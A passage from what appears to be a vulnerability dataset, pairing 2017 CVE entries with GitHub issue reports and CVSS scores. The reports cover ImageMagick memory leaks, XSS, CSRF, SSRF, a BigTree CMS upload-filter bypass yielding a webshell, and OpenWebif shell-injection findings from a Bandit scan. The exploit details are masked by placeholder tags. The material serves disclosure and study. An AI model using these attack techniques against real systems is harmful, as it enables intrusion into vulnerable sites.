  15421. "CVE_ID": "CVE-2017-9261",
  15422. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/476",
  15423. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/476",
  15424. "Repo_new": "imagemagick/imagemagick",
  15425. "Issue_Created_At": "2017-05-06T07:37:11Z",
  15426. "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit : APITAG of Venustech",
  15427. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15428. "severity": "MEDIUM",
  15429. "baseScore": 6.5,
  15430. "impactScore": 3.6,
  15431. "exploitabilityScore": 2.8
  15432. },
  15433. {
  15434. "CVE_ID": "CVE-2017-9262",
  15435. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/475",
  15436. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/475",
  15437. "Repo_new": "imagemagick/imagemagick",
  15438. "Issue_Created_At": "2017-05-06T07:35:38Z",
  15439. "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit: APITAG of Venustech",
  15440. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15441. "severity": "MEDIUM",
  15442. "baseScore": 6.5,
  15443. "impactScore": 3.6,
  15444. "exploitabilityScore": 2.8
  15445. },
  15446. {
  15447. "CVE_ID": "CVE-2017-9288",
  15448. "Issue_Url_old": "https://github.com/MindscapeHQ/raygun4wordpress/issues/16",
  15449. "Issue_Url_new": "https://github.com/mindscapehq/raygun4wordpress/issues/16",
  15450. "Repo_new": "mindscapehq/raygun4wordpress",
  15451. "Issue_Created_At": "2017-02-07T09:28:22Z",
  15452. "description": "A Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG Hello\uff1a I found a Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG which is developmented by your company, this plugin can be downloaded at wordpress plugin website \" URLTAG \". How can i send this vulnerability report to you to fix it. My Email is EMAILTAG .",
  15453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15454. "severity": "MEDIUM",
  15455. "baseScore": 6.1,
  15456. "impactScore": 2.7,
  15457. "exploitabilityScore": 2.8
  15458. },
  15459. {
  15460. "CVE_ID": "CVE-2017-9289",
  15461. "Issue_Url_old": "https://github.com/bramkorsten/Note/issues/11",
  15462. "Issue_Url_new": "https://github.com/bramkorsten/note/issues/11",
  15463. "Repo_new": "bramkorsten/note",
  15464. "Issue_Created_At": "2017-03-04T15:07:07Z",
  15465. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"edit\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  15466. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15467. "severity": "MEDIUM",
  15468. "baseScore": 6.1,
  15469. "impactScore": 2.7,
  15470. "exploitabilityScore": 2.8
  15471. },
  15472. {
  15473. "CVE_ID": "CVE-2017-9304",
  15474. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/674",
  15475. "Issue_Url_new": "https://github.com/virustotal/yara/issues/674",
  15476. "Repo_new": "virustotal/yara",
  15477. "Issue_Created_At": "2017-05-29T05:56:00Z",
  15478. "description": "Stack overflow in APITAG Stack overflow in APITAG Tested on Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15480. "severity": "HIGH",
  15481. "baseScore": 7.5,
  15482. "impactScore": 3.6,
  15483. "exploitabilityScore": 3.9
  15484. },
  15485. {
  15486. "CVE_ID": "CVE-2017-9307",
  15487. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/20",
  15488. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/20",
  15489. "Repo_new": "s3131212/allendisk",
  15490. "Issue_Created_At": "2017-05-09T08:58:30Z",
  15491. "description": "SSRF Vulnerability in FILETAG . /remotedownload.php CODETAG Obviously, $_POST['file'] could be within intranet ip range, eg. FILETAG , thus exposing a great attack surface.",
  15492. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15493. "severity": "MEDIUM",
  15494. "baseScore": 6.5,
  15495. "impactScore": 3.6,
  15496. "exploitabilityScore": 2.8
  15497. },
  15498. {
  15499. "CVE_ID": "CVE-2017-9331",
  15500. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/193",
  15501. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/193",
  15502. "Repo_new": "Telaxus/EPESI",
  15503. "Issue_Created_At": "2017-05-27T09:44:21Z",
  15504. "description": "Stored Cross site Scripting in Agenda APITAG tested on commit NUMBERTAG d NUMBERTAG Hi, I found a stored cross site scripting vulnerability in Agenda component. And i also tested it on github develop version(commit NUMBERTAG d NUMBERTAG it is vulnerable too. The POC is show below. Version : EPESI version NUMBERTAG re NUMBERTAG and develop version 'commit NUMBERTAG d NUMBERTAG FILETAG Login APITAG >CRM APITAG APITAG APITAG Title and Description APITAG FILETAG Back to Home > In Agenda section, when put your mouse cursor over Title, the script code will be excuted. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  15505. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15506. "severity": "MEDIUM",
  15507. "baseScore": 5.4,
  15508. "impactScore": 2.7,
  15509. "exploitabilityScore": 2.3
  15510. },
  15511. {
  15512. "CVE_ID": "CVE-2017-9333",
  15513. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/621",
  15514. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/621",
  15515. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  15516. "Issue_Created_At": "2017-06-26T18:33:24Z",
  15517. "description": "Bandit Output. As mentioned in another issue, this is the bandit's OWIF analysis report, I hope it helps you, I would appreciate if you would give me acknowledgement if you decide to fix those and sure this helps the vendors to upgrade to safer updated versions. Thank you Run started NUMBERTAG APITAG Test results: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG NUMBERTAG except Exception NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG class APITAG NUMBERTAG FN = PATHTAG NUMBERTAG def __init__(self, session): >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG BACKUP_PATH = \"/tmp NUMBERTAG BACKUP_FILENAME = APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG += \"%s \" % arg NUMBERTAG lines = popen(\"tar cvf %s %s\" % APITAG NUMBERTAG remove(checkfile) >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG check_tar = False NUMBERTAG lines = popen('tar tf %s' % APITAG NUMBERTAG for line in lines: >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG remove(bouquetfiles NUMBERTAG lines = popen('tar xvf %s C / exclude APITAG % APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG wadd = week NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = mktime( APITAG APITAG APITAG + wadd NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mode = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG oport = None NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG NUMBERTAG for i in data: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import glob NUMBERTAG tmpfiles = APITAG PATHTAG .ipk NUMBERTAG ipks = [] >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG def APITAG request NUMBERTAG APITAG = PATHTAG NUMBERTAG if APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG lines = popen( PATHTAG list | gzip > %s' % APITAG NUMBERTAG APITAG Disposition:\", \"attachment;filename= %s \" % APITAG NUMBERTAG Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import os NUMBERTAG FN = PATHTAG + filename NUMBERTAG fileh = os.open(FN, os. APITAG ) >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from os import path, listdir NUMBERTAG import APITAG NUMBERTAG from APITAG import _ >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG cnf = eval(path NUMBERTAG if APITAG == APITAG or APITAG == APITAG or APITAG == APITAG >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG data = APITAG or NUMBERTAG text = APITAG \"\")) >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG setupfile = file(setupfile, 'r NUMBERTAG setupdom = APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nic = str(nic NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Possible binding to all interfaces. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if ip is None or len(ip NUMBERTAG return NUMBERTAG return APITAG % (ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG ipaddress = list(tmpaddress NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from APITAG import about NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG distro = APITAG APITAG all NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagebuild NUMBERTAG except NUMBERTAG just in case >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb modules APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb proxy APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG filename = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nextactivation = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG import APITAG NUMBERTAG psfile = file(vpsfile, 'r') >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG psfile = file(vpsfile, 'r NUMBERTAG psdom = APITAG NUMBERTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG returns APITAG if the image supports the function APITAG on without T NUMBERTAG f = open( PATHTAG \"r NUMBERTAG APITAG = APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG write APITAG to file so that the box will power on ONCE skipping the HDMI CEC communication NUMBERTAG f = open( PATHTAG \"w NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG timeout = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mnow[\"sref\"] = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG time NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG request NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG True NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG servicetype, port NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: . APITAG NUMBERTAG print APITAG compile %s > %s\" % (src, dest NUMBERTAG if os.system(\"msgfmt '%s' o '%s'\" % (src, dest NUMBERTAG raise Exception, APITAG to compile: \" + src Code scanned: Total lines of code NUMBERTAG Total lines skipped ( nosec NUMBERTAG Run metrics: Total issues (by severity): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Total issues (by confidence): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Files skipped NUMBERTAG",
  15518. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15519. "severity": "HIGH",
  15520. "baseScore": 8.8,
  15521. "impactScore": 5.9,
  15522. "exploitabilityScore": 2.8
  15523. },
  15524. {
  15525. "CVE_ID": "CVE-2017-9333",
  15526. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/619",
  15527. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/619",
  15528. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  15529. "Issue_Created_At": "2017-06-20T14:02:01Z",
  15530. "description": "Remote code execution via APITAG improper input validation.. It was discovered that the APITAG class, specifically APITAG defined in PATHTAG does not restrict or incorrectly restricts the input package name before its included as param of PATHTAG package manager binary. A remote attacker could possibly use this flaw to pass a URL as package name parameter by a HTTP request to an attacker controlled repository since there is no signature verification.",
  15531. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15532. "severity": "HIGH",
  15533. "baseScore": 8.8,
  15534. "impactScore": 5.9,
  15535. "exploitabilityScore": 2.8
  15536. },
  15537. {
  15538. "CVE_ID": "CVE-2017-9364",
  15539. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/280",
  15540. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/280",
  15541. "Repo_new": "bigtreecms/bigtree-cms",
  15542. "Issue_Created_At": "2017-05-16T09:27:52Z",
  15543. "description": "Security hole for upload file bypass. ' Exploit Title: File Upload Bypass ' Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG ' Vendor Homepage: FILETAG ' Software Link: URLTAG ' Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface NUMBERTAG ulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG ar APITAG = APITAG The code of Regular expression shows that i could be bypassed by upload a file sometime, the lamp environment install on ubuntu and debian with apt get can Resolved to pht and phtml\uff0cso wo can bypass to upload a file in URLTAG upload file Name xxx.pht or APITAG Then the attacker could get a webshell by using this method the webshell url \uff1a FILETAG NUMBERTAG Solution Use white lists instead of black lists thank you",
  15544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15545. "severity": "CRITICAL",
  15546. "baseScore": 9.8,
  15547. "impactScore": 5.9,
  15548. "exploitabilityScore": 3.9
  15549. },
  15550. {
  15551. "CVE_ID": "CVE-2017-9365",
  15552. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/281",
  15553. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/281",
  15554. "Repo_new": "bigtreecms/bigtree-cms",
  15555. "Issue_Created_At": "2017-05-17T05:20:41Z",
  15556. "description": "CSRF exists in APITAG CMS Less than NUMBERTAG CSRF exists in APITAG CMS Less than NUMBERTAG with the force parameter to the PATHTAG For example: URLTAG A page with id NUMBERTAG can be unlocked. you my be use APITAG function. thank you !",
  15557. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15558. "severity": "HIGH",
  15559. "baseScore": 8.8,
  15560. "impactScore": 5.9,
  15561. "exploitabilityScore": 2.8
  15562. },
  15563. {
  15564. "CVE_ID": "CVE-2017-9366",
  15565. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/196",
  15566. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/196",
  15567. "Repo_new": "Telaxus/EPESI",
  15568. "Issue_Created_At": "2017-05-31T08:30:18Z",
  15569. "description": "Stored Cross site Scripting in Tab APITAG tested on commit c1d NUMBERTAG a7). Hi, I found a stored cross site scripting vulnerability in the tab_name parameter. And I also test it on github latest develop version(commit c1d NUMBERTAG a7), it is vulnerable too. The POC is show below. Administrator Login APITAG APITAG APITAG Dashboard APITAG APITAG new Tab APITAG crafted lable APITAG FILETAG When other Administrator Login to the Dashboard, the script code will be executed. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  15570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  15571. "severity": "MEDIUM",
  15572. "baseScore": 4.8,
  15573. "impactScore": 2.7,
  15574. "exploitabilityScore": 1.7
  15575. },
  15576. {
  15577. "CVE_ID": "CVE-2017-9378",
  15578. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/282",
  15579. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/282",
  15580. "Repo_new": "bigtreecms/bigtree-cms",
  15581. "Issue_Created_At": "2017-05-17T05:41:21Z",
  15582. "description": "design flaw in APITAG CMS Less than NUMBERTAG There is two design flaw in APITAG CMS Less than NUMBERTAG one. the administrator level user can delete another administrator level user, resulting in malicious delete. the current user can only delete users who have less privileges than him. two. the current user can delete himself Bypass system APITAG system is disabled by default\uff09. the current user may net delete himself. the Flawed code: PATHTAG APITAG PATHTAG ERRORTAG",
  15583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  15584. "severity": "MEDIUM",
  15585. "baseScore": 6.5,
  15586. "impactScore": 3.6,
  15587. "exploitabilityScore": 2.8
  15588. },
  15589. {
  15590. "CVE_ID": "CVE-2017-9379",
  15591. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/287",
  15592. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/287",
  15593. "Repo_new": "bigtreecms/bigtree-cms",
  15594. "Issue_Created_At": "2017-06-02T09:06:56Z",
  15595. "description": "Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the clear parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will clear ERRORTAG report tow with the from and to parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will create one NUMBERTAG Redirect you my be use APITAG function. thank you !",
  15596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15597. "severity": "HIGH",
  15598. "baseScore": 8.8,
  15599. "impactScore": 5.9,
  15600. "exploitabilityScore": 2.8
  15601. },
  15602. {
  15603. "CVE_ID": "CVE-2017-9405",
  15604. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/457",
  15605. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/457",
  15606. "Repo_new": "imagemagick/imagemagick",
  15607. "Issue_Created_At": "2017-04-28T04:00:47Z",
  15608. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG bc NUMBERTAG fb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15610. "severity": "MEDIUM",
  15611. "baseScore": 6.5,
  15612. "impactScore": 3.6,
  15613. "exploitabilityScore": 2.8
  15614. },
  15615. {
  15616. "CVE_ID": "CVE-2017-9407",
  15617. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/459",
  15618. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/459",
  15619. "Repo_new": "imagemagick/imagemagick",
  15620. "Issue_Created_At": "2017-04-28T04:02:12Z",
  15621. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f7b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f2c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15623. "severity": "MEDIUM",
  15624. "baseScore": 6.5,
  15625. "impactScore": 3.6,
  15626. "exploitabilityScore": 2.8
  15627. },
  15628. {
  15629. "CVE_ID": "CVE-2017-9409",
  15630. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/458",
  15631. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/458",
  15632. "Repo_new": "imagemagick/imagemagick",
